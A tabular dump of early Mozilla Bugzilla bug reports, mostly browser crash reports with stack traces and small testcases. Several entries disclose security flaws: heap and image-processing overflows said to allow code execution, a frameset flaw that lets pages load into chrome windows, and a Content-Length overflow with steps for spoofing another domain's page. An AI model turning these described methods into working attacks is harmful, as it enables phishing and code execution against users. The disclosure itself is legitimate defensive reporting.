Bug ID
int64 961
1.91M
| Comment ID
int64 3.98k
17.1M
| Author
stringlengths 8
48
| Comment Text
stringlengths 1
64.3k
⌀ |
---|---|---|---|
251,931 | 2,207,142 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040717 Firefox/0.9.1+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040717 Firefox/0.9.1+
can't update any extensions or themes, firefox shows the message: "Firefox was
not able to find any available updates. Firefox encountered problems when tryubg
to find updates for some items."
Reproducible: Always
Steps to Reproduce:
1. click in the toolbar on tools
2. than click on extensions or themes
3. choose one theme or extensions and press the update button
Actual Results:
the same es everytime
Expected Results:
say that their is no update this time, or give me a message that their is an
update to download
|
|
244,490 | 2,158,432 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8a2) Gecko/20040522 Firefox/0.8.0+
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8a2) Gecko/20040522 Firefox/0.8.0+
Firefox crashes when pseudo elements ":before" or ":after" have content "URL"
and document's base element is nonsense.
1: <?xml version="1.0" encoding="UTF-8"?>
2: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
3: "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
4: <html xml:lang="de" xmlns="http://www.w3.org/1999/xhtml">
5: <head>
6: <title>Crash Test</title>
7: <base href="D:\CSS Test Files\" />
8: <style type="text/css">
9: p { border: 1px red solid }
10: p:before { content: url("images/quote_end.png") }
11: </style>
12: </head>
13: <body>
14: <p>Did it crash?</p>
15: </body>
16: </html>
Reproducible: Always
Steps to Reproduce:
1. Try to view "http://home.arcor.de/plsdontreply/crashtest.html"
Actual Results:
Firefox crashes
Expected Results:
Just ignore nonsense in <base/> element.
Reference:
http://forums.mozillazine.org/viewtopic.php?t=79058&sid=a881c8e5a30ec1487b84264c1b001cd7
|
|
244,619 | 2,159,440 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; cs-CZ; rv:1.7) Gecko/20040514
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; cs-CZ; rv:1.7) Gecko/20040514
If I call eval() as a method of some object Mozilla crashes if the evaluating
code contains declaration of some variable.
See example:
function f1()
{
var o = new Object();
eval.call(o, "var a = 'vodka'"); // <- CRASH !!!
}
When the code is not in the function (so run directly in window object), the
crash never happened.
The crash is dependent on the "var" declaration - evaluating of the "a =
'vodka'" is OK.
During the call eval.call(o, "some code") I can see in the JS console warning
"function eval must be called directly, and not by way of a function of another
name", so probably this is not much likable syntax, but it this working in other
cases and I am for some reason using it.
Tested with Mozilla 1.7rc2 (Mozilla/5.0 (Windows; U; Windows NT 5.0; cs-CZ;
rv:1.7) Gecko/20040514)
Taklback ID: TB59963Z
Source File, Line No.
d:/BUILDS/tinderbox/Mozilla1.7/WINNT_5.0_Clobber/mozilla/js/src/jsparse.c, line 2016
2014 brendan 3.64 for (fp = cx->fp; (fp->flags & JSFRAME_SPECIAL) &&
fp->down; fp = fp->down)
2015 brendan 3.53 continue;
* 2016 brendan 3.33 obj = fp->varobj;
2017 fun = fp->fun;
Reproducible: Always
Steps to Reproduce:
|
|
248,825 | 2,187,846 |
Build ID: 2004-06-27-08, Windows XP trunk Seamonkey.
This is definitely NOT the same crash experienced originally in bug 185357. I
have verified that the reduced testcase at
http://bugzilla.mozilla.org/attachment.cgi?id=151258&action=view NO LONGER crashes.
Steps to Reproduce:
1. Load http://www.ign.com (get past the ad page)
2. File | Print Preview
Actual Results:
Crashes here:
nsBlockFrame::SplitPlaceholder
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3768]
nsInlineFrame::ReflowInlineFrame
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsInlineFrame.cpp,
line 780]
nsInlineFrame::ReflowFrames
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsInlineFrame.cpp,
line 530]
nsInlineFrame::Reflow
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsInlineFrame.cpp,
line 443]
nsLineLayout::ReflowFrame
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsLineLayout.cpp,
line 990]
nsBlockFrame::ReflowInlineFrame
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3587]
nsBlockFrame::DoReflowInlineFrames
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3415]
nsBlockFrame::DoReflowInlineFramesAuto
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3316]
nsBlockFrame::ReflowInlineFrames
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3261]
nsBlockFrame::ReflowLine
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 2428]
nsBlockFrame::ReflowDirtyLines
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 2087]
nsBlockFrame::ComputeFinalSize
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 1210]
nsBlockFrame::Reflow
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 914]
nsBlockReflowContext::ReflowBlock
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockReflowContext.cpp,
line 547]
nsBlockFrame::ReflowFloat
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 5024]
nsBlockReflowState::FlowAndPlaceFloat
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockReflowState.cpp,
line 865]
nsBlockReflowState::AddFloat
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockReflowState.cpp,
line 672]
nsLineLayout::ReflowFrame
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsLineLayout.cpp,
line 1014]
nsBlockFrame::ReflowInlineFrame
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3587]
nsBlockFrame::DoReflowInlineFrames
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3415]
nsBlockFrame::DoReflowInlineFramesAuto
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3316]
nsBlockFrame::ReflowInlineFrames
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3261]
nsBlockFrame::ReflowLine
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 2428]
nsBlockFrame::ReflowDirtyLines
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 2087]
nsBlockFrame::Reflow
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 815]
nsBlockReflowContext::ReflowBlock
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockReflowContext.cpp,
line 547]
nsBlockFrame::ReflowFloat
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 5024]
nsBlockReflowState::FlowAndPlaceFloat
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockReflowState.cpp,
line 865]
nsBlockReflowState::AddFloat
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockReflowState.cpp,
line 672]
nsLineLayout::ReflowFrame
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsLineLayout.cpp,
line 1014]
nsBlockFrame::ReflowInlineFrame
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3587]
nsBlockFrame::DoReflowInlineFrames
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3415]
nsBlockFrame::DoReflowInlineFramesAuto
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3316]
nsBlockFrame::ReflowInlineFrames
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3261]
nsBlockFrame::ReflowLine
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 2428]
nsBlockFrame::ReflowDirtyLines
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 2087]
nsBlockFrame::Reflow
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 815]
nsBlockReflowContext::ReflowBlock
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockReflowContext.cpp,
line 547]
nsBlockFrame::ReflowBlockFrame
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3040]
nsBlockFrame::ReflowLine
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 2306]
nsBlockFrame::ReflowDirtyLines
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 2087]
nsBlockFrame::Reflow
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 815]
nsBlockReflowContext::ReflowBlock
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockReflowContext.cpp,
line 547]
nsBlockFrame::ReflowFloat
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 5024]
nsBlockReflowState::FlowAndPlaceFloat
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockReflowState.cpp,
line 865]
nsBlockReflowState::AddFloat
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockReflowState.cpp,
line 672]
nsLineLayout::ReflowFrame
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsLineLayout.cpp,
line 1014]
nsBlockFrame::ReflowInlineFrame
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3587]
nsBlockFrame::DoReflowInlineFrames
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3415]
nsBlockFrame::DoReflowInlineFramesAuto
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3316]
nsBlockFrame::ReflowInlineFrames
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3261]
nsBlockFrame::ReflowLine
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 2428]
nsBlockFrame::ReflowDirtyLines
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 2087]
nsBlockFrame::Reflow
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 815]
nsBlockReflowContext::ReflowBlock
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockReflowContext.cpp,
line 547]
nsBlockFrame::ReflowBlockFrame
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3040]
nsBlockFrame::ReflowLine
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 2306]
nsBlockFrame::ReflowDirtyLines
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 2087]
nsBlockFrame::Reflow
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 815]
nsBlockReflowContext::ReflowBlock
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockReflowContext.cpp,
line 547]
nsBlockFrame::ReflowBlockFrame
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 3040]
nsBlockFrame::ReflowLine
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 2306]
nsBlockFrame::ReflowDirtyLines
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 2087]
nsBlockFrame::Reflow
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsBlockFrame.cpp,
line 815]
|
|
249,067 | 2,189,460 |
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Build Identifier:
I have uninstalled netscape and Firefox 0.8. No dice. I have removed very
reference to mozilla, netscape, and firefox from the registry. I have
screenshots of the weird hybrid netscape/firefox install wizard.
Reproducible: Always
Steps to Reproduce:
1.Download 9.1 installer
2.Double click
3.Click next.
Actual Results:
Thinks its netscape and after I tell it to install.
Expected Results:
Installed Firefox.
|
|
336,432 | 2,845,603 |
When Adblock Plus 0.7 is installed and enabled, I crash immediately when visiting the front page on Haaretz.
This regressed between 2006-05-02 and 2006-05-03. Based on the stacktrace (see below), I'm guessing this is a regression from bug 334407.
Steps to reproduce:
1. Install Adblock plus 0.7 from http://adblockplus.mozdev.org/installation.html
2. Visit http://www.haaretz.co.il/?from=hasot
Note that there's no need to define any filters in order to crash, but adblock must be enabled and active.
The Talkback reports I got are all blank/junk (which might be a separate bug): TB18248627M, TB18249515E.
Here's the top of the Problem Report I'm getting from OS X:
Date/Time: 2006-05-03 17:37:56.975 +0300
OS Version: 10.4.6 (Build 8I127)
Report Version: 4
Command: firefox-bin
Path: /Users/urib/Desktop/Minefield 2006-05-03 copy.app/Contents/MacOS/firefox-bin
Parent: launchd [1]
Version: 3.0a1 (3.0a1)
PID: 7816
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x00000000
Thread 0 Crashed:
0 org.mozilla.firefox 0x00429ab0 nsScriptSecurityManager::SecurityCompareURIs(nsIURI*, nsIURI*, int*) + 112
1 org.mozilla.firefox 0x0042b1dc nsScriptSecurityManager::CheckSameOriginPrincipalInternal(nsIPrincipal*, nsIPrincipal*, int) + 312
2 org.mozilla.firefox 0x00293e24 nsGlobalWindow::SetTimeoutOrInterval(int, int*) + 1412
3 org.mozilla.firefox 0x002938e4 nsGlobalWindow::SetTimeoutOrInterval(int, int*) + 68
4 libxpcom_core.dylib 0x2c05447c _XPTC_InvokeByIndex + 216
5 org.mozilla.firefox 0x00498c7c XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) + 2524
6 org.mozilla.firefox 0x0048bf98 XPC_WN_CallMethod(JSContext*, JSObject*, unsigned, long*, long*) + 220
7 libmozjs.dylib 0x2302db20 js_Invoke + 1832
8 libmozjs.dylib 0x23037994 js_Interpret + 35728
9 libmozjs.dylib 0x2302db64 js_Invoke + 1900
|
|
337,036 | 2,849,459 |
BUILD: Current Firefox trunk GTK2 debug build
STEPS TO REPRODUCE: Close a dialog (the security dialog that comes up when going from an insecure page to a secure one, an alert, etc).
ACTUAL RESULTS: About half the time, Mozilla crashes.
EXPECTED RESULTS: No crashes.
DETAILS:
The stack is (for an alert):
#6 0x00d14d4d in g_type_check_instance_is_a () from /usr/lib/libgobject-2.0.so.0
#7 0x00cfae0e in g_object_get_data () from /usr/lib/libgobject-2.0.so.0
#8 0xb6736149 in get_window_for_gtk_widget (widget=0x8b68c78)
at ../../../../mozilla/widget/src/gtk2/nsWindow.cpp:3833
#9 0xb67393c1 in IM_get_owning_window (aArea=0x8bdc638)
at ../../../../mozilla/widget/src/gtk2/nsWindow.cpp:5402
#10 0xb67386e5 in nsWindow::IMEGetOwningWindow (this=0x8e79c60)
at ../../../../mozilla/widget/src/gtk2/nsWindow.cpp:4975
#11 0xb6738686 in nsWindow::IMEComposingWindow (this=0x8e79c60)
at ../../../../mozilla/widget/src/gtk2/nsWindow.cpp:4966
#12 0xb6737f62 in nsWindow::IMEDestroyContext (this=0x8e79c60)
at ../../../../mozilla/widget/src/gtk2/nsWindow.cpp:4782
#13 0xb672e1d2 in nsWindow::Destroy (this=0x8e79c60)
at ../../../../mozilla/widget/src/gtk2/nsWindow.cpp:429
#14 0xb56fcb81 in ~nsView (this=0x8e79bf0) at ../../../mozilla/view/src/nsView.cpp:264
#15 0xb56fcd76 in nsIView::Destroy (this=0x8e79bf0)
at ../../../mozilla/view/src/nsView.cpp:302
#16 0xb5702140 in ~nsViewManager (this=0x8e79b70)
at ../../../mozilla/view/src/nsViewManager.cpp:228
#17 0xb570267f in nsViewManager::Release (this=0x8e79b70)
at ../../../mozilla/view/src/nsViewManager.cpp:293
#18 0xb5256e1c in nsCOMPtr<nsIViewManager>::~nsCOMPtr ()
at ../../../../dist/include/dom/nsIDOMDocument.h:27
#19 0xb5248427 in ~DocumentViewerImpl (this=0x8e84fb0)
at ../../../mozilla/layout/base/nsDocumentViewer.cpp:555
#20 0xb52479cf in DocumentViewerImpl::Release (this=0x8e84fb0)
at ../../../mozilla/layout/base/nsDocumentViewer.cpp:526
#21 0xb663d198 in ~nsCOMPtr (this=0xbfff8774)
at ../../../../dist/include/xpcom/nsCOMPtr.h:583
#22 0xb6636add in nsWindowWatcher::OpenWindowJSInternal (this=0x81897f0,
aParent=0x88cc1d0, aUrl=0xb66851e0 "chrome://global/content/commonDialog.xul",
aName=0xb6685003 "_blank",
aFeatures=0xb6685080 "centerscreen,chrome,modal,titlebar", aDialog=1, argc=1,
argv=0x9163850, aCalledFromJS=0, _retval=0xbfff8b24)
at ../../../../../mozilla/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:932
#23 0xb6634798 in nsWindowWatcher::OpenWindow (this=0x81897f0, aParent=0x88cc1d0,
aUrl=0xb66851e0 "chrome://global/content/commonDialog.xul",
aName=0xb6685003 "_blank",
aFeatures=0xb6685080 "centerscreen,chrome,modal,titlebar", aArguments=0x8ba9648,
_retval=0xbfff8b24)
at ../../../../../mozilla/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:480
#24 0xb664961d in nsPromptService::DoDialog (this=0x8a65d78, aParent=0x88cc1d0,
aParamBlock=0x8ba9648,
aChromeURL=0xb66851e0 "chrome://global/content/commonDialog.xul")
at ../../../../../mozilla/embedding/components/windowwatcher/src/nsPromptService.cpp:657
#25 0xb6646e14 in nsPromptService::Alert (this=0x8a65d78, parent=0x88cc1d0,
dialogTitle=0xbfff8d6c, text=0x87b63e8)
at ../../../../../mozilla/embedding/components/windowwatcher/src/nsPromptService.cpp:132
#26 0xb6630079 in nsPrompt::Alert (this=0x87b6400, dialogTitle=0xbfff8d6c,
text=0x87b63e8)
at ../../../../../mozilla/embedding/components/windowwatcher/src/nsPrompt.cpp:217
I have no idea what we're passing to GTK here, but it's clearly not what it expects...
|
|
338,288 | 2,857,967 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
This suite loads a frameset that contains a frameset which in turn contains a frame, launches a popup that keeps a reference to one of its elements, submits the innermost frame (to the delay perl script) and then replaces the inner frameset two times. For an unknown reason the old frame remains accessible from the popup window in a zombie state, it is possible to load web pages into it (the firefox status bar reflects that the page and its media are being loaded although nothing else is visible).
Even more weird, when launching a popup dialog from that frame, previously launched popup windows get overwritten - including chrome windows (e.g. browser properties).
Sometimes the browser also crashes while doing this due to an attempt to dereference a function pointer on a freed object. Here this should just crash the browser; although it seems to be impossible to me right now there might be the chance of executing arbitrary code that way.
Reproducible: Always
Steps to Reproduce:
1. Unzip the contained files onto some web server (there's a perl file that is required for creating a delay of 2 seconds).
2. Open index.html
3. Follow instructions
Actual Results:
Browser crashes or loads a custom html page into a chrome window
Expected Results:
Browser should have prevented javascript code from performing those actions
|
|
334,142 | 2,829,153 |
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
Some "submit" in some forms (please consider I'm not able to demonstrate this with a link to my home banking system, cause you have to be logged in to verify) do not transmit nothing and the progress bar at the bottom remains empty. This could be an issue solved by recent security changes (MFSA 2006-28 Security check of js_ValueToFunctionObject() can be circumvented or MFSA 2006-24 Privilege escalation using crypto.generateCRMFRequest), but to fill a problem with the online bank help desk I have to have more specific details of what has to be changed to make their application work again. Installing back a 1.5.0.1 makes these problems disappear.
Reproducible: Always
Steps to Reproduce:
1. Log into my online banking system
2. Try to make some form based operations
3. Nothing happens
Actual Results:
Some "submit" in some forms (please consider I'm not able to demonstrate this with a link to my home banking system, cause you have to be logged in to verify) do not transmit nothing and the progress bar at the bottom remains empty.
Expected Results:
Browser have to display some page after the "submit".
Re-installing Firefox 1.5.0.1 solves
|
|
335,333 | 2,838,219 |
Summary: Relative, remote images which have a Content-Base fail to display.
This probably won't end up in MailNews:Backend as it is currently, but just filing here for now...
Regression Range: Between 2006-04-10-07 and 2006-04-11-10, relative image URIs aren't being resolved nor displayed.
Steps to Reproduce:
1. Go to http://www.iusb.edu
2. In Suite, do a File | Send Page
3. View the mail message (click the "Not a Scam" button and show remote images, if prompted)
Expected Results:
Relative-pathed images such as <img src="foo/bar.gif"> should display, since the message includes both Content-Base and Content-Location fieldsets.
Actual Results:
No relative images display.
The message's HTML content setup is something like this:
Content-Type: text/html; charset=ISO-8859-1;
name="www.iusb.edu/"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="www.iusb.edu/"
Content-Base: "http://www.iusb.edu/"
Content-Location: "http://www.iusb.edu/"
The actual URI is like:
<img src="img/topnav-right.gif">
|
|
327,608 | 2,779,428 |
Steps to reproduce:
1. Make sure the testcase is allowed to open popup windows (to force GC).
2. Load the testcase.
Result:
Mac debug: Always aborts with "Assertion failure: prop, at jsfun.c:1046"
Mac nightly: Sometimes crashes [@ js_SetCallVariable].
Expected:
No crash or assertion failure.
I spent many hours trying to create a reduced testcase for this crash. I hope it's useful.
|
|
328,258 | 2,784,819 |
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20060221 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20060221 Firefox/1.6a1
A file processing vulnerability exists within Firefox and Deer Park Alpha 2, which allows for an attacker to cause the browser to crash, and or execute arbitrary code on a targeted host.
The vulnerability is caused due to a boundary error within the “ARGB32_image_ARGB32 ()” function when processing a malformed .gif file. Below is output from gdb on OS X 10.4.5 PPC with Deerpark2 (build 2006022104):
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x0efcd6f8
0x9043c6f0 in ARGB32_image_ARGB32 ()
Versions Tested:
Firefox 1.5.0.1 on OS X 10.4.5 PPC
Deer Park Alpha 2 build: 2006022104
Talkback Incident #:
TB15506379Q
Please let me know if you need any other information.
Thanks,
--
Tom Ferris
Researcher
www.security-protocols.com
Key fingerprint = 0DFA 6275 BA05 0380 DD91 34AD C909 A338 D1AF 5D78
Reproducible: Always
Steps to Reproduce:
|
|
328,514 | 2,786,718 |
SSL connection attempts between tstclnt and selfserv fail when
the pre-master secret needs to be computed over nistp521 or
nistb571 (curves nistp384/nistk409 and smaller work ok).
|
|
328,751 | 2,788,927 |
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20060221 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20060221 Firefox/1.6a1
A heap overflow vulnerability exists within Firefox and Deer Park Alpha 2,
which allows for an attacker to cause the browser to crash, and or execute
arbitrary code on a targeted host.
The vulnerability is caused due to a boundary error within the
“SinkContext::~SinkContext ()” function when processing an applet. Below is output from gdb on OS X 10.4.5 PPC with Deerpark2 (build 2006022104):
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x7c7f1b78
0x0054bdec in SinkContext::~SinkContext ()
(gdb) bt
#0 0x0054bdec in SinkContext::~SinkContext ()
#1 0x0054dbe4 in HTMLContentSink::~HTMLContentSink ()
#2 0x0059bf4c in nsContentSink::Release ()
#3 0x00307f84 in nsParser::~nsParser ()
#4 0x00308028 in nsParser::Release ()
#5 0x003479ac in nsDocumentOpenInfo::OnStopRequest ()
#6 0x000abbd8 in nsBaseChannel::OnStopRequest ()
#7 0x000cb788 in nsInputStreamPump::OnStateStop ()
#8 0x000cb32c in nsInputStreamPump::OnInputStreamReady ()
#9 0x10083238 in nsAStreamCopier::PostContinuationEvent_Locked ()
#10 0x10044aa4 in PL_HandleEvent ()
#11 0x100449c8 in PL_ProcessPendingEvents ()
#12 0x9075ea68 in __CFRunLoopDoSources0 ()
#13 0x9075df98 in __CFRunLoopRun ()
#14 0x9075da18 in CFRunLoopRunSpecific ()
#15 0x9317d1e0 in RunCurrentEventLoopInMode ()
#16 0x93261f20 in GetNextEventMatchingMask ()
#17 0x93261df0 in WNEInternal ()
#18 0x93261d50 in WaitNextEvent ()
#19 0x006d9700 in nsMacMessagePump::GetEvent ()
#20 0x006d965c in nsMacMessagePump::DoMessagePump ()
#21 0x00369238 in nsAppShell::Run ()
#22 0x00405b80 in nsAppStartup::Run ()
#23 0x00014514 in XRE_main ()
#24 0x0000f698 in start ()
#25 0x0000f518 in start ()
(gdb) quit
Versions Affected:
Deer Park Alpha 2 build: 2006022104 on OS X 10.4.5
Camino 1.0 seems to just lock up, and not crash.
Talkback Incident #:
TB15697882X
Please let me know if you need any other information.
Thanks,
--
Tom Ferris
Researcher
www.security-protocols.com
Key fingerprint = 0DFA 6275 BA05 0380 DD91 34AD C909 A338 D1AF 5D78
Reproducible: Always
Steps to Reproduce:
|
|
328,817 | 2,789,679 |
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: N/A
Note: This bug was originally reported to IPA (Information-technology Promotion Agency, Japan) and forwarded to us at Mozilla Japan. I'm NOT original reporter. Don't mention my name in the security advisory. For more information about IPA, visit http://www.ipa.go.jp/about/english/
IPA#36721438
Attackers can forge a Web page on another domain by overflowing Content-Length response header. This could be used for the real phishing to steal sensitive data, such as user password or cookies. This bug was originally reported as a vulnerability discovered in Internet Explorer, but Firefox shares the same problem.
Windows XP Professional SP2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060129 Firefox/1.6a1
Reproducible: Always
Steps to Reproduce:
1. Send and receive two pairs of HTTP requests/responses on the same TCP session with keep-alive of HTTP 1.0 or 1.1.
2. Set HTTP response of first pair to contain Content-Length header over 0x80000301 bytes.
Actual Results:
The partial HTTP response of first pair is shown as response to the second request.
Expected Results:
The partial HTTP response of first pair is NOT shown as response to the second request.
